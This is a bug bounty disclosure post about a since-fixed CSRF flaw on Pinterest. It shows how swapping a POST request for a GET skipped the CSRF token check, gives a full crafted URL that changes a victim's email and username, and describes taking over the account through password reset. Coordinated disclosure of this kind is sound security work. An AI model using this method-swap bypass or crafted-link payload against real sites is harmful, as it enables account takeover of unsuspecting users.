Pinterest runs a public bug bounty program on Bugcrowd. The Pinterest security team has fixed the vulnerability and has allowed me to publish this blog.
This was a simple CSRF vulnerability that could modify any user’s email id and username thereby leading to account takeover, this vulnerability was severe because there are 250 million monthly active users on Pinterest.
Note: All accounts used to demonstrate the vulnerability are test accounts
What was the bug?
While browsing through “https://www.pinterest.com”, I observed that the CSRF tokens are passed through the http header “X-CSRFToken”,so to validate the implementation of the CSRF token I used the below request, this request is used to modify the user settings
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
Host: www.pinterest.com
Content-Type: application/x-www-form-urlencoded
X-CSRFToken: <CSRF Token>
……..
……..
<POST Parameters>
1)Firstly, I removed the “X-CSRFToken” header from the above POST request and forwarded it, this gave an error in the response saying “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,which meant that the CSRF token was being validated.
2)Then I changed the POST request to a GET and forwarded the request(without the”X-CSRFToken” header) this time I got “200 ok” as the response.
The CSRF token was not getting validated when the POST request was converted to a GET
Note: This was an application wide CSRF, as most of the endpoints in the application were vulnerable to this
Account Takeover:
As this is a GET based CSRF , all we need to do is to craft a link as shown below(this link can be crafted using the “change request method” option in burp suite):
“https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D”
when a user clicks on the above link his username and email id changes to “dummyuser” and “anytestemail@user.com” respectively(the email id “anytestemail@user.com” is under my control and has been used in the crafted link) .
After the successful CSRF attack, I browsed to the following link to reset the password:
“https://www.pinterest.com/password/reset/”
I entered the email id as “anytestemail@user.com” ,I then received an email from Pinterest along with a password reset link (“anytestemail@user.com” is currently the email id of the user who clicked on the crafted link, as the email id was modified due the CSRF vulnerability)I used this password reset link to reset the password and login to the user’s account
I would like to thank the Pinterest Security Team for fixing the vulnerability quickly and allowing me to disclose this submission and the Bugcrowd team for properly handling and coordinating the report.
Timeline:
1st December 2018: Vulnerability Reported
7th December 2018: Triaged
7th December 2018: Pinterest rewarded a bounty of $2400
7th December 2018: Vulnerability Fixed